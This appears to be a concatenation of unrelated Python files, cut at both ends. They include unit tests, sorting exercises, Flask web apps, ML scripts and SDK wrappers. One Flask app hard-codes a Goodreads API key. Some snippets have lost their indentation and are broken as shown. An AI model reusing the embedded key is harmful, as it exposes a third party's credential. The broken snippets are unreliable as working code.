            self.bowl_1 * self.vanilla__bowl_1 +
            self.bowl_2 * self.vanilla__bowl_2
        )
        self.assertEqual(0.625, vanilla)

    def test__01_06(self):
        # M&M problem: posterior odds by hand, then via MultipleBayesRule.
        yellow__1994 = self.mix_1994.p(color='yellow')
        yellow__1996 = self.mix_1996.p(color='yellow')
        green__1994 = self.mix_1994.p(color='green')
        green__1996 = self.mix_1996.p(color='green')
        likelihood_a = yellow__1994 * green__1996
        likelihood_b = yellow__1996 * green__1994
        prior_likelihood_a = self.bag.p(bag=1994) * likelihood_a
        prior_likelihood_b = self.bag.p(bag=1996) * likelihood_b
        evidence = prior_likelihood_a + prior_likelihood_b
        self.assertAlmostEqual(20 / 27, prior_likelihood_a / evidence, 10)
        self.assertAlmostEqual(7 / 27, prior_likelihood_b / evidence, 10)
        # using BayesRule
        priors = {'a': 0.5, 'b': 0.5}
        likelihoods = {
            'a': yellow__1994 * green__1996,
            'b': yellow__1996 * green__1994
        }
        bayes_rule = MultipleBayesRule(
            prior=priors, likelihood=likelihoods
        )
        posterior = bayes_rule.posterior()
        self.assertAlmostEqual(20 / 27, posterior['a'], 10)
        self.assertAlmostEqual(7 / 27, posterior['b'], 10)

    def test__01_07(self):
        # Monty-Hall-style posteriors for two likelihood assignments.
        priors = {'a': 1 / 3, 'b': 1 / 3, 'c': 1 / 3}
        likelihoods = {'a': 1 / 2, 'b': 0, 'c': 1}
        posterior = MultipleBayesRule(
            prior=priors, likelihood=likelihoods
        ).posterior()
        self.assertEqual(posterior['a'], 1 / 3)
        self.assertEqual(posterior['b'], 0)
        self.assertEqual(posterior['c'], 2 / 3)
        likelihoods = {'a': 1, 'b': 0, 'c': 1}
        posterior = MultipleBayesRule(
            prior=priors, likelihood=likelihoods
        ).posterior()
        self.assertEqual(posterior['a'], 1 / 2)
        self.assertEqual(posterior['b'], 0)
        self.assertEqual(posterior['c'], 1 / 2)
|
# Punctuation characters removed from words before comparison.
exclude = ('.', ',', '\"', '!', '?')

def handleFile(file):
    """Return the set of unique lower-cased words in *file*.

    Characters listed in ``exclude`` are stripped out of each word.
    Returns an empty set when the file does not exist.

    Fixes: the original returned None on the missing-file path, which
    crashed the set operations performed by callers; its error message
    was also missing a space after the filename.
    """
    try:
        with open(file, 'r') as f:
            data = f.readlines()
    except FileNotFoundError:
        print(file + ' not found.')
        return set()
    data = [d.strip() for d in data]
    pWords = ' '.join(data).split(' ')
    words = set()
    for word in pWords:
        s = ''.join(ch for ch in word if ch not in exclude)
        if s != '':
            words.add(s.lower())
    return words
# Compare the vocabularies of the two files using set algebra.
words1 = handleFile('file1.txt')
words2 = handleFile('file2.txt')
print('\nAll unique words contained in both files:')
print(words1 | words2)
print('\nWords common to both files:')
print(words1 & words2)
print('\nWords in file1 but not in file2:')
print(words1 - words2)
print('\nWords in file2 but not in file1:')
print(words2 - words1)
print('\nWords in file1 or file2, but not both:')
print(words1 ^ words2)
|
#!C:\Users\Vaibhavi Raut\AppData\Local\Programs\Python\Python37
'''
WAP to accept a list of integers from user to sort them using bubble sort.
it checks adjacent numbers in per iteration
'''
'''
def sort_recur(x,n):
if n==1:
return
for i in range(n+1):
if(x[i]>x[i+1]):
#swap(x[i],x[j]) #swap func won't work becoz it is swap by value not reference.
temp = x[i]
x[i] = x[i+1]
x[i+1] = temp
print(x)
return sort_recur(x,n-1)
'''
def sort(x, n):
    """Bubble-sort list *x* of length *n* in place and return it,
    printing the list after every comparison (one line per inner step)."""
    for outer in range(n):
        # After each outer pass the largest remaining value has bubbled
        # to position n - outer - 1, so the inner range shrinks.
        for inner in range(0, n - outer - 1):
            if x[inner] > x[inner + 1]:
                # Tuple assignment swaps without a temporary variable.
                x[inner], x[inner + 1] = x[inner + 1], x[inner]
            print(x)
    return x
def main():
    """Read an integer-list literal from the user, bubble-sort it, and
    print each iteration plus the final sorted list."""
    # Security fix: ast.literal_eval parses only Python literals, unlike
    # eval(), which would execute arbitrary expressions typed by the user.
    import ast
    x = ast.literal_eval(input("Enter an integer List: "))
    print("Iterations:")
    print("Sorted List: ", sort(x, len(x)))

if __name__ == '__main__':
    main()
'''
Enter an integer List: [3,2,4,1,5]
Iterations:
[2, 3, 4, 1, 5]
[2, 3, 4, 1, 5]
[2, 3, 1, 4, 5]
[2, 3, 1, 4, 5]
[2, 3, 1, 4, 5]
[2, 1, 3, 4, 5]
[2, 1, 3, 4, 5]
[1, 2, 3, 4, 5]
[1, 2, 3, 4, 5]
[1, 2, 3, 4, 5]
Sorted List: [1, 2, 3, 4, 5]
'''
|
""" Wrappers around Indy-SDK functions to overcome shortcomings in the SDK.
"""
import json
from indy import did, crypto, non_secrets, error
async def create_and_store_my_did(wallet_handle):
    """Create and store my DID, also recording a verkey->DID mapping via
    the non_secrets API so the DID can later be looked up by key.
    """
    my_did, my_vk = await did.create_and_store_my_did(wallet_handle, '{}')
    await non_secrets.add_wallet_record(
        wallet_handle,
        'key-to-did',
        my_vk,   # record id: the verkey
        my_did,  # record value: the DID
        '{}'
    )
    return (my_did, my_vk)
async def store_their_did(wallet_handle, their_did, their_vk):
    """Store their DID, also recording a verkey->DID mapping via the
    non_secrets API.
    """
    identity = {
        'did': their_did,
        'verkey': their_vk,
    }
    await did.store_their_did(wallet_handle, json.dumps(identity))
    await non_secrets.add_wallet_record(
        wallet_handle,
        'key-to-did',
        their_vk,   # record id: the verkey
        their_did,  # record value: the DID
        '{}'
    )
async def did_for_key(wallet_handle, key):
    """Retrieve the DID mapped to *key* from the non_secrets verkey->DID
    map, or None when no record exists.

    Fix: the original's local result variable was named ``did``, shadowing
    the imported ``did`` module inside this function.
    """
    found_did = None
    try:
        record = json.loads(
            await non_secrets.get_wallet_record(
                wallet_handle,
                'key-to-did',
                key,
                '{}'
            )
        )
        found_did = record['value']
    except error.IndyError as e:
        # A missing record simply means "no DID for this key".
        if e.error_code is error.ErrorCode.WalletItemNotFound:
            pass
        else:
            raise e
    return found_did
async def get_wallet_records(wallet_handle: int, search_type: str) -> list:
    """ Search for records of a given type in a wallet.
    :param wallet_handle: Handle of the wallet to search.
    :param search_type: Type of records to search.
    :return: List of all records found.
    """
    list_of_records = []
    search_handle = await non_secrets.open_wallet_search(wallet_handle,
                                                         search_type,
                                                         json.dumps({}),
                                                         json.dumps({'retrieveTotalCount': True}))
    # Page through results 10 at a time until the search is exhausted.
    while True:
        results_json = await non_secrets.fetch_wallet_search_next_records(wallet_handle,
                                                                          search_handle, 10)
        results = json.loads(results_json)
        if results['totalCount'] == 0 or results['records'] is None:
            break
        for record in results['records']:
            # Flatten: the stored JSON value plus the record id as '_id'.
            record_value = json.loads(record['value'])
            record_value['_id'] = record['id']
            list_of_records.append(record_value)
    # NOTE(review): the search handle is not closed if an await above
    # raises — consider wrapping the loop in try/finally.
    await non_secrets.close_wallet_search(search_handle)
    return list_of_records
|
"""
.. module:: ConvoBatch
ConvoBatch
*************
Trains a model according to a configuration file (--batch) or the harcoded config object
It uses the files for each individual day
Model is trained using the train_on_batch method from Keras model, so only a day is loaded in memory at a time
:Description: ConvoBatch
:Authors: bejar
:Version:
:Created on: 23/12/2016 15:05
"""
import argparse
import keras.models
from Traffic.Models.SimpleModels import simple_model
from Traffic.Private.DBConfig import mongoconnection
from Traffic.Util.ConvoTrain import load_dataset
from Traffic.Util.ConvoTrain import transweights, train_model_batch
from Traffic.Util.DataGenerators import list_days_generator
from keras import backend as K
from pymongo import MongoClient
from Traffic.Util.Misc import load_config_file, transweights
__author__ = 'bejar'
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--batch', help='Non interactive run', action='store_true', default=False)
    parser.add_argument('--config', default='config', help='Experiment configuration')
    parser.add_argument('--resume', default=None, help='Resume existing experiment training')
    parser.add_argument('--retrain', default=None, help='Continue existing experiment training')
    args = parser.parse_args()
    if args.batch:
        # Batch mode: expand the (year, month, first-day, last-day) ranges
        # from the config file into explicit day lists.
        config = load_config_file(args.config)
        ldaysTr = []
        for y, m, di, df in config['traindata']:
            ldaysTr.extend(list_days_generator(y, m, di, df))
        config['traindata'] = ldaysTr
        ldaysTs = []
        for y, m, di, df in config['testdata']:
            ldaysTs.extend(list_days_generator(y, m, di, df))
        config['testdata'] = ldaysTs
    else:
        # Interactive mode: hard-coded experiment configuration.
        ldaysTr = list_days_generator(2016, 11, 1, 30)
        ldaysTs = list_days_generator(2016, 12, 1, 2)
        classweight = {0: 1.0, 1: 1.0, 2: 2.0, 3: 3.0, 4: 4.0}
        config = {
            'datapath': '/home/bejar/storage/Data/Traffic/Datasets/',
            'savepath': '/home/bejar/storage/Data/Traffic/Models/',
            'traindata': ldaysTr,
            'testdata': ldaysTs,
            'rebalanced': False,
            'zfactor': 0.25,
            'model': 4,
            'convolayers':
                {'sizes': [128, 64, 32],
                 'convofields': [3, 3],
                 'dpconvo': 0.2,
                 'pool': ['max', 2, 2]},
            'fulllayers':
                {'sizes': [64, 32],
                 'regfull': ['l1', 0.2]},
            'optimizer':
                # NOTE(review): 'sdg' looks like a typo for 'sgd' — confirm
                # against the optimizer factory before changing the value.
                {'method': 'sdg',
                 'params':
                     {'lrate': 0.005,
                      'momentum': 0.9,
                      'nesterov': False,
                      'decay': 0
                      }},
            "train":
                {"batchsize": 256,
                 "epochs": 200,
                 "classweight": transweights(classweight)},
            'imgord': 'th'
        }
    # config['optimizer']['params']['decay'] = config['lrate'] / config['epochs']
    K.set_image_dim_ordering(config['imgord'])
    # Only the test set in memory, the training is loaded in batches
    _, test, test_labels, num_classes = load_dataset(config, only_test=True, imgord=config['imgord'])
    config['input_shape'] = test[0][0].shape
    config['num_classes'] = num_classes
    resume = None
    if args.retrain is not None:  # Network already trained
        client = MongoClient(mongoconnection.server)
        db = client[mongoconnection.db]
        db.authenticate(mongoconnection.user, password=mongoconnection.passwd)
        col = db[mongoconnection.col]
        vals = col.find_one({'_id': int(args.retrain)}, {'config': 1})
        if vals is None:
            raise ValueError('This experiment does not exist ' + args.retrain)
        else:
            # Retraining is only valid on compatible data and class weights.
            if config['zfactor'] != vals['config']['zfactor']:
                raise ValueError('Incompatible Data')
            weights = config['train']['classweight']
            for w in weights:
                if weights[w] != vals['config']['train']['classweight'][w]:
                    raise ValueError('Incompatible class weights')
            config['model'] = vals['config']['model']
            config['convolayers'] = vals['config']['convolayers']
            config['fulllayers'] = vals['config']['fulllayers']
            config['cont'] = args.retrain
            model = keras.models.load_model(config['savepath'] + args.retrain + '.h5')
    elif args.resume is not None:  # Network interrupted
        client = MongoClient(mongoconnection.server)
        db = client[mongoconnection.db]
        db.authenticate(mongoconnection.user, password=mongoconnection.passwd)
        col = db[mongoconnection.col]
        # Bug fix: this branch looked up int(args.retrain), which is None
        # here — the resume branch must query by args.resume.
        vals = col.find_one({'_id': int(args.resume)}, {'config': 1, 'acc': 1})
        if vals is None:
            raise ValueError('This experiment does not exist ' + args.resume)
        else:
            config = vals['config']
            # Bug fix: the 'acc' history is projected into vals, not into
            # the stored config sub-document.
            config['train']['epochs_trained'] = len(vals['acc'])
            model = keras.models.load_model(config['savepath'] + args.resume + '.h5')
            resume = vals
    else:  # New model
        model = simple_model(config)
    train_model_batch(model, config, test, test_labels, resume=resume)
|
#!/usr/bin/env python3
class VBoxLibException(Exception):
    """Raised for VirtualBox helper-library failures.

    The former explicit ``__init__`` only forwarded ``message`` to
    ``Exception.__init__``, which the inherited constructor already does,
    so it has been removed (same behavior, less code).
    """
|
from flask import jsonify
from flask_restful import Resource, abort
from runner.data import db_session
from runner.data.command import Command
from runner.data.command_parser import command_parser, command_parser_not_required
def abort_if_not_found(command_id):
    """Respond with HTTP 404 when no Command row matches *command_id*."""
    session = db_session.create_session()
    if session.query(Command).get(command_id) is None:
        abort(404, message=f"Command {command_id} not found")
class CommandResource(Resource):
    """REST resource for a single Command row (get/delete/update by id)."""

    def get(self, command_id):
        """Return the command as JSON, or 404 if it does not exist."""
        abort_if_not_found(command_id)
        session = db_session.create_session()
        command = session.query(Command).get(command_id)
        return jsonify({'command': command.to_dict()})

    def delete(self, command_id):
        """Delete the command, or 404 if it does not exist."""
        abort_if_not_found(command_id)
        session = db_session.create_session()
        command = session.query(Command).get(command_id)
        session.delete(command)
        session.commit()
        return jsonify({'success': 'OK'})

    def put(self, command_id):
        """Update any provided fields of the command, or 404 if it does not exist."""
        abort_if_not_found(command_id)
        args = command_parser_not_required.parse_args()
        session = db_session.create_session()
        command = session.query(Command).get(command_id)
        for token in ('action_name', 'trigger', 'answer'):
            if token in args and args[token] is not None:
                # BUG FIX: the previous exec(f"command.{token} = '{args[token]}'")
                # broke on any quote in the value and let request data inject
                # arbitrary code; setattr is safe and equivalent.
                setattr(command, token, args[token])
        session.commit()
        return jsonify({'success': 'OK'})
class CommandResourceMany(Resource):
    """Read-only listing of every Command bound to a given port."""

    def get(self, port):
        session = db_session.create_session()
        matching = session.query(Command).filter(Command.port == port).all()
        return jsonify({"commands": [command.to_dict() for command in matching]})
class CommandListResource(Resource):
    """Creation endpoint for Command rows."""

    def post(self):
        """Create a Command from the parsed request arguments."""
        args = command_parser.parse_args()
        session = db_session.create_session()
        new_command = Command(
            action_name=args['action_name'],
            trigger=args['trigger'],
            answer=args['answer'],
            port=args['port'],
        )
        session.add(new_command)
        session.commit()
        return jsonify({'success': 'OK'})
|
import asyncio
import signal
import gunicorn.workers.base as base
class GunicornWorker(base.Worker):
    """Gunicorn worker that drives the WSGI app from its own asyncio loop.

    Each worker process replaces the inherited event loop with a fresh one
    and keeps gunicorn's arbiter satisfied via a heartbeat coroutine.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Exit status reported back to the gunicorn master.
        self.exit_code = 0

    def init_process(self):
        # Discard the loop inherited from the master (it may predate fork)
        # and install a fresh loop owned by this worker process.
        asyncio.get_event_loop().close()
        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)
        super().init_process()

    def run(self):
        # Schedule the application and the heartbeat, then block forever.
        self._runner = asyncio.ensure_future(self._run(), loop=self.loop)
        self.pulse = asyncio.ensure_future(self.heart_beat(), loop=self.loop)
        self.loop.run_forever()

    async def _run(self):
        # NOTE(review): self.wsgi.run() looks blocking — presumably the
        # application cooperates with this loop; confirm against the app.
        self.wsgi.run()

    async def heart_beat(self):
        # Notify the arbiter periodically; silence past the timeout gets
        # the worker killed.
        while self.alive:
            self.notify()
            await asyncio.sleep(self.timeout)

    def init_signals(self):
        # Deliberately skip gunicorn's default signal handler installation.
        pass
|
from lexer import Lexer
from parser_pasc import Parser
# PAULO HENRIQUE DOS SANTOS - 11722528
# RAFAEL MOREIRA ALMEIDA - 11722680
if __name__ == "__main__":
    # Drive the compiler: lex and parse 'prog1.txt', then release the file.
    lexer = Lexer('prog1.txt')
    parser = Parser(lexer)
    parser.prog()
    parser.lexer.closeFile()
# token = lexer.proxToken() -> the tokens used to be fetched from here
# print("\n")
# print("Symbol table:\n")
# lexer.printTS()
# lexer.closeFile()
# print('\nEnd of compilation\n')
|
# See file COPYING distributed with xnatrest for copyright and license.
from .exceptions import *
from .core import *
from .resources import *
# eof
|
"""zhinst-toolkit multistate node adaptions."""
import typing as t
import numpy as np
import zhinst.utils.shfqa.multistate as utils
from zhinst.toolkit.nodetree import Node, NodeTree
from zhinst.toolkit.nodetree.node import NodeList
from zhinst.toolkit.nodetree.helper import (
lazy_property,
create_or_append_set_transaction,
)
class Qudit(Node):
    """Single Qudit node.

    Implements basic functionality of a single qudit node, e.g applying the
    basic configuration.

    Args:
        root: Root of the nodetree.
        tree: Tree (node path as tuple) of the current node.
        serial: Serial of the device.
        readout_channel: Index of the readout channel this qudit belongs to.
    """

    def __init__(
        self,
        root: NodeTree,
        tree: tuple,
        serial: str,
        readout_channel: int,
    ):
        super().__init__(root, tree)
        self._daq_server = root.connection
        self._serial = serial
        self._readout_channel = readout_channel

    def configure(
        self,
        qudit_settings: utils.QuditSettings,
        enable: bool = True,
    ) -> None:
        """Compiles a list of transactions to apply the qudit settings to the device.

        Args:
            qudit_settings: The qudit settings to be configured.
            enable: Whether to enable the qudit. (default: True)
        """
        # The qudit index is the last element of this node's tree path.
        qudit_index = int(self._tree[-1])
        node_value_pairs = utils.get_settings_transaction(
            self._serial,
            self._readout_channel,
            qudit_index,
            qudit_settings,
            enable=enable,
        )
        # Queue every (node, value) pair inside one set transaction.
        with create_or_append_set_transaction(self._root):
            for node_path, node_value in node_value_pairs:
                self._root.transaction.add(node_path, node_value)
class MultiState(Node):
    """MultiState node.

    Implements basic functionality of the MultiState node.

    Args:
        root: Root of the nodetree.
        tree: Tree (node path as tuple) of the current node.
        serial: Serial of the device.
        index: Index of the corresponding readout channel.
    """

    def __init__(
        self,
        root: NodeTree,
        tree: tuple,
        serial: str,
        index: int,
    ):
        super().__init__(root, tree)
        self._daq_server = root.connection
        self._serial = serial
        self._index = index

    def get_qudits_results(self) -> t.Dict[int, np.ndarray]:
        """Downloads the qudit results from the device and group them by qudit.

        This function accesses the multistate nodes to determine which
        integrators were used for which qudit to able to group the results by
        qudit.

        Returns:
            A dictionary with the qudit index keys and result vector values.
        """
        return utils.get_qudits_results(self._daq_server, self._serial, self._index)

    @lazy_property
    def qudits(self) -> t.Sequence[Qudit]:
        """A Sequence of Qudits."""
        # Build one Qudit child per entry under this node's "qudits" branch.
        qudit_nodes = []
        for qudit_index in range(len(self["qudits"])):
            qudit_nodes.append(
                Qudit(
                    self._root,
                    self._tree + ("qudits", str(qudit_index)),
                    self._serial,
                    self._index,
                )
            )
        return NodeList(qudit_nodes, self._root, self._tree + ("qudits",))
|
import matplotlib.pyplot as plt
import numpy as np
"""用于为了避免"""
x = np.linspace(-3, 3, 50)
y = 0.1 * x
plt.figure()
plt.plot(x, y, linewidth=10)
plt.ylim(-2, 2) # 设置y从-2到2
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
# 将下面的边框作为横坐标轴,左边边框作为竖坐标轴
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0)) # 可以去掉看看效果
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0)) # 可以去掉看看效果
# 获取图像中所有的label,并且设置图像中的label
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(12) # 设置字体大小为12
label.set_bbox(dict(facecolor='white', edgecolor='None', alpha=0.7))
# 设置label颜色是白色,edgecolor边框颜色无,透明度为0.7
plt.show() |
import re
class DoesntHeHaveInternElvesforThis:
    """Advent of Code 2015 day 5: count "nice" strings.

    Note the inverted convention: the check methods return True when the
    string is NAUGHTY, and count_nice_strings counts the falsy results.
    """

    def __init__(self):
        with open("2015/5/input.txt", "r") as source:
            self.strings = source.read().splitlines()

    @staticmethod
    def check_if_nice_one(string):
        """True when *string* is naughty under the part-one rules."""
        has_forbidden_pair = re.search(r"ab|cd|pq|xy", string) is not None
        has_double_letter = re.search(r"(\w)\1", string) is not None
        has_three_vowels = re.search(r"[aeiou].*[aeiou].*[aeiou]", string) is not None
        return has_forbidden_pair or not has_double_letter or not has_three_vowels

    @staticmethod
    def check_if_nice_two(string):
        """True when *string* is naughty under the part-two rules."""
        has_repeated_pair = re.search(r"(..).*\1", string) is not None
        has_sandwich_letter = re.search(r"(.).\1", string) is not None
        return not has_repeated_pair or not has_sandwich_letter

    def count_nice_strings(self, check_for_nice_fn):
        """Count input strings for which the naughtiness check is falsy."""
        return sum(1 for candidate in self.strings if not check_for_nice_fn(candidate))
if __name__ == "__main__":
task = DoesntHeHaveInternElvesforThis()
print('Solution to first part: {}'.format(
task.count_nice_strings(DoesntHeHaveInternElvesforThis.check_if_nice_one)
))
print('Solution to second part: {}'.format(
task.count_nice_strings(DoesntHeHaveInternElvesforThis.check_if_nice_two)
)) |
import os
from os import path

# Build the absolute paths the bot needs, each with a trailing separator:
# p -> <cwd>/dbs/, p1 -> <cwd>/, pl -> <cwd>/logs/
# (the original hand-rolled Windows backslashes with raw strings and
# slicing; os.path.join + os.sep is equivalent there and portable here).
base = os.path.abspath('')
p = os.path.join(base, 'dbs') + os.sep
p1 = base + os.sep
pl = os.path.join(base, 'logs') + os.sep

# Make sure the storage directories exist.
os.makedirs("dbs", exist_ok=True)
os.makedirs("logs", exist_ok=True)

# Database files (and their backups) live under dbs/.
pmain = p + "db_main_info.txt"
pmainb = p + "db_main_info_backup.txt"
pused = p + "db_used_info.txt"
pusedb = p + "db_used_info_backup.txt"
pach = p + "db_achievements_info.txt"
pachb = p + "db_achievements_info_backup.txt"

# Create every missing database file as an empty UTF-8 text file.
for db_file in (pmain, pmainb, pused, pusedb, pach, pachb):
    if not path.exists(db_file):
        open(db_file, "w", encoding="utf8").close()

# Write a skeleton .env pointing the bot at the files created above.
if not path.exists(".env"):
    with open(p1 + ".env", "w", encoding="utf8") as f:
        f.write('BOT_TOKEN=\nADMIN_ID=\nMAIN_INFO='
                + pmain + '\nMAIN_INFO_BACKUP='
                + pmainb + '\nUSED_INFO='
                + pused + '\nUSED_INFO_BACKUP='
                + pusedb + '\nACHIEVEMENTS_INFO='
                + pach + '\nACHIEVEMENTS_INFO_BACKUP='
                + pachb + '\nLOGS_PATH=' + pl)
print('done!')
|
import os
import requests
from flask import Flask, session, render_template, url_for, request, redirect, flash
from flask_bcrypt import Bcrypt
from flask_session import Session
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)

# Check for environment variable
if not os.getenv("DATABASE_URL"):
    raise RuntimeError("DATABASE_URL is not set")

# Configure session to use filesystem
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)

# Set up database.
# BUG FIX: the engine was built from os.getenv('database_url') — a lowercase
# variable that is never set (the one validated above is "DATABASE_URL") —
# while a hard-coded URL containing live credentials sat unused in the
# module. Use the validated environment variable and keep credentials out
# of source control.
engine = create_engine(os.getenv("DATABASE_URL"))
db = scoped_session(sessionmaker(bind=engine))

# for password hashing
bcrypt = Bcrypt(app)

# goodreads api key
# NOTE(review): API keys belong in configuration, not in source control.
api_key = 'pXU1aeUhm4RKk98xkH6tw'

# Name of the currently logged-in user (None while anonymous).
# NOTE(review): a module-level global is shared across ALL clients of this
# process; Flask's per-user session would be the correct store.
loggedin_name = None
@app.route("/")
@app.route("/home", methods=['GET', 'POST'])
def home():
return render_template('home.html', title='Home', stylefile='homie.css', name=loggedin_name)
@app.route('/book', methods=['POST', 'GET'])
def book():
    """Search books by ISBN/title/author/year and show Goodreads ratings.

    Requires a logged-in user; anonymous visitors are redirected to /login.
    """
    if request.method == 'POST':
        if not loggedin_name:
            flash("You are not logged in.", category="warning")
            return redirect(url_for('login'))
        else:
            query = request.form['search']
            found_books = db.execute('SELECT * FROM books WHERE isbn=:query OR title=:query OR author=:query OR year=:query', {'query':query}).fetchall()
            if found_books:
                books_isbns = [row['isbn'] for row in found_books]
                str_books_isbns = ",".join(books_isbns)
                # Fetch Goodreads rating counts for every matched ISBN at once.
                res = requests.get("https://www.goodreads.com/book/review_counts.json", params={'key':api_key, 'isbns':str_books_isbns})
                res = res.json()
                # Loop variable renamed from 'book': it shadowed this view function.
                book_review = [(entry['work_ratings_count'], entry['average_rating'])
                               for entry in res['books']]
                return render_template('book.html', title='Books Found', found_books=enumerate(found_books), name=loggedin_name, stylefile='bookee.css', book_review=book_review)
            else:
                flash('No books found!', category='warning')
                return redirect(url_for('home'))
    # BUG FIX: a plain GET previously fell off the end and returned None,
    # which Flask turns into a 500 error. Send the visitor home instead.
    return redirect(url_for('home'))
@app.route("/login", methods=['GET', 'POST'])
def login():
if request.method=='POST':
form = request.form
user_email = form['email']
user_password = form['password']
# check user authentication
user_exist = db.execute('SELECT email FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
if user_exist:
matching_password = db.execute('SELECT password FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
if bcrypt.check_password_hash(matching_password[0], user_password):
flash('Logged in successfully.', category='success')
user_name = db.execute('SELECT name FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
# return render_template('home.html', title='Home', stylefile='homie.css', name=user_name[0])
global loggedin_name
loggedin_name=user_name[0]
print(loggedin_name)
return redirect(url_for('home'))
else:
flash('Incorrect password!', category='danger')
else:
flash('Invalid email! Please check or sign up.', category='danger')
return render_template('login.html', title='Log in', stylefile='logine.css')
@app.route("/signup", methods=['GET', 'POST'])
def signup():
if request.method=='POST':
form = request.form
user_name = form['name']
user_email = form['email']
user_password = form['password']
user_confirmpassword = form['confirmPassword']
hashed_password = bcrypt.generate_password_hash(user_password).decode('utf-8')
# check if email already exists
found_email = db.execute('SELECT * FROM users WHERE email = :useremail', {'useremail':user_email}).fetchone()
if found_email:
flash('Email already exists!', category="danger")
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
elif user_confirmpassword != user_password:
flash('Passwords don\'t match', category="danger")
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
else:
# add user data to database
db.execute('INSERT INTO users (name, email, password) VALUES (:username, :useremail, :userpassword)', {'username':user_name, 'useremail':user_email, 'userpassword':hashed_password})
db.commit()
flash('Account created successfully.', category='success')
return redirect(url_for('login'))
else:
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
@app.route('/logout')
def logout():
    """Forget the remembered user name and return to the landing page."""
    global loggedin_name
    loggedin_name=None
    return redirect(url_for('home'))
|
from django.contrib import admin

from apply.models import Apply, Project, ProjectComment

# Expose the apply-app models in the Django admin site.
for model in (Apply, Project, ProjectComment):
    admin.site.register(model)
from typing import List, NamedTuple
from textblob import Word
MIN_CONFIDENCE = 0.5
class SuggestedWord(NamedTuple):
    """A spelling candidate paired with its spellcheck confidence score."""

    # word: the suggested replacement spelling
    # confidence: score in [0, 1] as produced by textblob's Word.spellcheck()
    word: str
    confidence: float
def get_spelling_suggestions(
    word: str, min_confidence: float = MIN_CONFIDENCE
) -> List[SuggestedWord]:
    """Return spelling suggestions for *word* meeting *min_confidence*.

    Uses ``textblob.Word.spellcheck()``, which yields ``(candidate, score)``
    pairs; only candidates whose score is at least the threshold are kept.
    """
    # The original loop rebound the name ``word`` while iterating, shadowing
    # the input parameter; unpacking into fresh names avoids that.
    return [
        SuggestedWord(candidate, confidence)
        for candidate, confidence in Word(word).spellcheck()
        if confidence >= min_confidence
    ]
|
def tupla_par(tupla):
    """Return a tuple with the elements of *tupla* found at even indexes.

    Generalized: works for any sequence (tuple, list, string, ...) and
    always returns a tuple, matching the original behavior for tuples.
    """
    # Extended slicing picks indexes 0, 2, 4, ... in a single step,
    # replacing the manual index loop with i % 2 == 0.
    return tuple(tupla[::2])
# sample tuple, as given in the exercise statement
tupla1 = ('oi', 'estou', 'estudando', 'poo')
# new tuple produced by the tupla_par function
tupla2 = (tupla_par(tupla1))
# print the resulting tuple
print(tupla2)
|
import pytest
@pytest.fixture(params=[1,2,3])
def login(request):
    """Parametrized fixture: dependent tests run once per value in params."""
    # The printed string below is runtime output ("fetch data") and is
    # intentionally left unchanged.
    print(request.param)
    print("获取数据")
def test_case111(login):
    """Consumes the ``login`` fixture, so it executes once per fixture param."""
    # Runtime message ("running test case 111") intentionally unchanged.
    print('\n'"执行测试用例111")
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 30 15:42:39 2019
@author: aakansha.dhawan
"""
import pickle
from PIL import Image
from numpy import asarray
from numpy import expand_dims
from mtcnn.mtcnn import MTCNN
from sklearn.preprocessing import LabelEncoder
from keras.models import load_model
out_encoder = LabelEncoder()
def extract_face(filename, required_size=(160, 160)):
    """Detect the first face in an image file and return it as an RGB array.

    Returns a ``required_size`` face crop as a numpy array.
    NOTE(review): assumes at least one face is detected — ``results[0]``
    raises IndexError on a face-free image; confirm callers guarantee this.
    """
    # load image from file
    image = Image.open(filename)
    # convert to RGB, if needed
    image = image.convert('RGB')
    # convert to array
    pixels = asarray(image)
    # create the detector, using default weights
    detector = MTCNN()
    # detect faces in the image
    results = detector.detect_faces(pixels)
    # extract the bounding box from the first face
    x1, y1, width, height = results[0]['box']
    # bug fix: MTCNN can report slightly negative box coordinates
    x1, y1 = abs(x1), abs(y1)
    x2, y2 = x1 + width, y1 + height
    # extract the face
    face = pixels[y1:y2, x1:x2]
    # resize pixels to the model size
    image = Image.fromarray(face)
    image = image.resize(required_size)
    face_array = asarray(image)
    #image.show()
    return face_array
def get_embedding(model, face_pixels):
    """Return the model's embedding vector for one standardized face image."""
    # work in float32 and standardize globally across all channels
    pixels = face_pixels.astype('float32')
    pixels = (pixels - pixels.mean()) / pixels.std()
    print(pixels.shape)
    # the model expects a batch, so prepend a length-1 axis
    batch = expand_dims(pixels, axis=0)
    print(batch.shape)
    # predict, then strip the batch axis again
    return model.predict(batch)[0]
def predict(image):
    """Classify the face in *image* (a file path) and return (name, probability).

    Loads the serialized SVM classifier and the FaceNet embedding model
    from disk on every call.
    """
    filename = 'finalized_model.sav'
    # NOTE(review): pickle.load on an untrusted file executes arbitrary
    # code; only load models from trusted sources.
    model_svm = pickle.load(open(filename, 'rb'))
    # BUG FIX: the parameter was previously overwritten with the hard-coded
    # path "test2.jpg", so callers could never choose the image.
    extracted_face = extract_face(image)
    model = load_model('facenet_keras.h5')
    face_emmbed = get_embedding(model, extracted_face)
    face_emmbed = asarray(face_emmbed)
    face_emmbed = expand_dims(face_emmbed, axis=0)
    yhat_class = model_svm.predict(face_emmbed)
    yhat_prob = model_svm.predict_proba(face_emmbed)
    class_index = yhat_class[0]
    class_probability = yhat_prob[0, class_index] * 100
    # Map SVM class indexes to people. The previous if-chain left ``name``
    # unbound (NameError) for any class outside 0..5.
    names = {
        0: "aakansha_dhawan",
        1: "ben_afflek",
        2: "elton_john",
        3: "jerry_seinfeld",
        4: "madonna",
        5: "mindy_kaling",
